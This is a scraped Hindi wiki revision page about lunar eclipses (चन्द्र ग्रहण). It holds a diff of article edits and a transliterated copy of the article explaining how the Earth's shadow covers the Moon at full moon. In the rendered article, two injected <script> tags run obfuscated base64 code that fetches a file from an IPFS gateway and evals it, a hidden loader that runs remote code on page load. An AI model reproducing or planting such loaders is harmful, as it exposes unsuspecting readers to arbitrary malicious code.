Difference between revisions of "चन्द्र ग्रहण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
[[चित्र:800px-Diagram.png|thumb|300px|right|चन्द्र ग्रहण<br/>Moon Eclipse]]
+
[[चित्र:Moon-Eclipse.jpg|thumb|300px|right|चन्द्र ग्रहण<br/>Moon Eclipse]]
चन्द्रमा और सूर्य के बीच पृथ्वी का आना ही चन्द्र ग्रहण कहलाता है। चंद्र ग्रहण तब होता है जब सूर्य व चन्द्रमा के बीच पृथ्वी इस तरह से आ जाता है कि पृथ्वी की छाया से चन्द्रमा का पूरा या आंशिक भाग ढक जाता है और पृथ्वी सूर्य की किरणों के चांद तक पहुंचने में अवरोध लगा देती है। तो पृथ्वी के उस हिस्से में चन्द्र ग्रहण नजर आता है। चन्द्र ग्रहण दो प्रकार का नजर आता है। पूरा चन्द्रमा ढक जाने पर सर्वग्रास चन्द्रग्रहण तथा आंशिक रूप से ढक जाने पर खण्डग्रास ( उपच्छाया ) चन्द्रग्रहण लगता है। ऐसा केवल पूर्णिमा के दिन संभव होता है, इसलिये चन्द्रग्रहण हमेशा पूर्णिमा के दिन ही होता है।  
+
[[चन्द्रमा]] और [[सूर्य]] के बीच [[पृथ्वी]] का आना ही चन्द्र ग्रहण कहलाता है। चंद्र ग्रहण तब होता है जब सूर्य व चन्द्रमा के बीच पृथ्वी इस तरह से आ जाता है कि पृथ्वी की छाया से चन्द्रमा का पूरा या आंशिक भाग ढक जाता है और पृथ्वी सूर्य की किरणों के चांद तक पहुंचने में अवरोध लगा देती है। तो पृथ्वी के उस हिस्से में चन्द्र ग्रहण नजर आता है। चन्द्र ग्रहण दो प्रकार का नजर आता है।
 +
*पूरा चन्द्रमा ढक जाने पर सर्वग्रास चन्द्रग्रहण
 +
*आंशिक रूप से ढक जाने पर खण्डग्रास (उपच्छाया) चन्द्रग्रहण लगता है। ऐसा केवल पूर्णिमा के दिन संभव होता है, इसलिये चन्द्रग्रहण हमेशा [[पूर्णिमा]] के दिन ही होता है।  
  
 
पृथ्वी की छाया सूर्य से 6 राशि के अन्तर पर भ्रमण करती है तथा पूर्णमासी को चन्द्रमा की छाया सूर्य से 6 राशि के अन्तर होते हुए जिस पूर्णमासी को सूर्य एवं चन्द्रमा दोनों के अंश, कला एवं विकला पृथ्वी के समान होते हैं अर्थात एक सीध में होते हैं, उसी पूर्णमासी को चन्द्र ग्रहण लगता है।
 
पृथ्वी की छाया सूर्य से 6 राशि के अन्तर पर भ्रमण करती है तथा पूर्णमासी को चन्द्रमा की छाया सूर्य से 6 राशि के अन्तर होते हुए जिस पूर्णमासी को सूर्य एवं चन्द्रमा दोनों के अंश, कला एवं विकला पृथ्वी के समान होते हैं अर्थात एक सीध में होते हैं, उसी पूर्णमासी को चन्द्र ग्रहण लगता है।
 
[[चित्र:T00sequence1w.jpg|thumb|550px|center|चन्द्र ग्रहण<br/>Moon Eclipse]]
 
  
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
Line 16: Line 16:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
 
 +
[[Category:खगोल_कोश]][[Category:खगोल_शास्त्र]]
 
__INDEX__
 
__INDEX__
[[Category:खगोल_कोश]][[Category:खगोल_शास्त्र]]
 

Revision as of 09:15, 11 January 2011

thumb|300px|right|chandr grahan
Moon Eclipse
chandrama aur soory ke bich prithvi ka ana hi chandr grahan kahalata hai. chandr grahan tab hota hai jab soory v chandrama ke bich prithvi is tarah se a jata hai ki prithvi ki chhaya se chandrama ka poora ya aanshik bhag dhak jata hai aur prithvi soory ki kiranoan ke chaand tak pahuanchane mean avarodh laga deti hai. to prithvi ke us hisse mean chandr grahan najar ata hai. chandr grahan do prakar ka najar ata hai.

  • poora chandrama dhak jane par sarvagras chandragrahan .
  • aanshik roop se dhak jane par khandagras (upachchhaya) chandragrahan lagata hai. aisa keval poornima ke din sanbhav hota hai, isaliye chandragrahan hamesha poornima ke din hi hota hai.

prithvi ki chhaya soory se 6 rashi ke antar par bhraman karati hai tatha poornamasi ko chandrama ki chhaya soory se 6 rashi ke antar hote hue jis poornamasi ko soory evan chandrama donoan ke aansh, kala evan vikala prithvi ke saman hote haian arthat ek sidh mean hote haian, usi poornamasi ko chandr grahan lagata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh